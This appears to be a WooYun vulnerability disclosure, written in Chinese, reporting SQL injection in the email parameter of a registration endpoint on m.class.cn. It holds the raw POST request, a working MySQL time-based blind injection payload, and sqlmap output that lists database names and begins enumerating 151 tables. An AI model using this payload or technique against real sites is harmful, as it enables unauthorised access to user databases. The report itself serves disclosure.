WooYun.org

1,注入点:
POST http://m.class.cn/user/register_ajax HTTP/1.1
email=aaa%40aa.com&passwd=aaaa1111&conpasswd=aaaa1111&nickName=ffdfsd.x&act=reg
第一个参数Email就有注入
2,看看具体结果
Parameter: email (POST)
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: [email protected]' AND (SELECT * FROM (SELECT(SLEEP(5)))SeIC) AND 'KpgP'='KpgP&passwd=aaaa1111&conpasswd=aaaa1111&nickName=aaaa1111&act=reg
---
web application technology: PHP 5.4.10
back-end DBMS: MySQL 5.0.12
available databases [2]:
[*] bbsnew
[*] information_schema
3,大概151张表
back-end DBMS: MySQL 5.0.12
[11:56:51] [INFO] fetching tables for database: 'bbsnew'
[11:56:51] [INFO] fetching number of tables for database 'bbsnew'
[11:56:51] [INFO] resumed: 151
[11:56:51] [INFO] resumed: cdb_access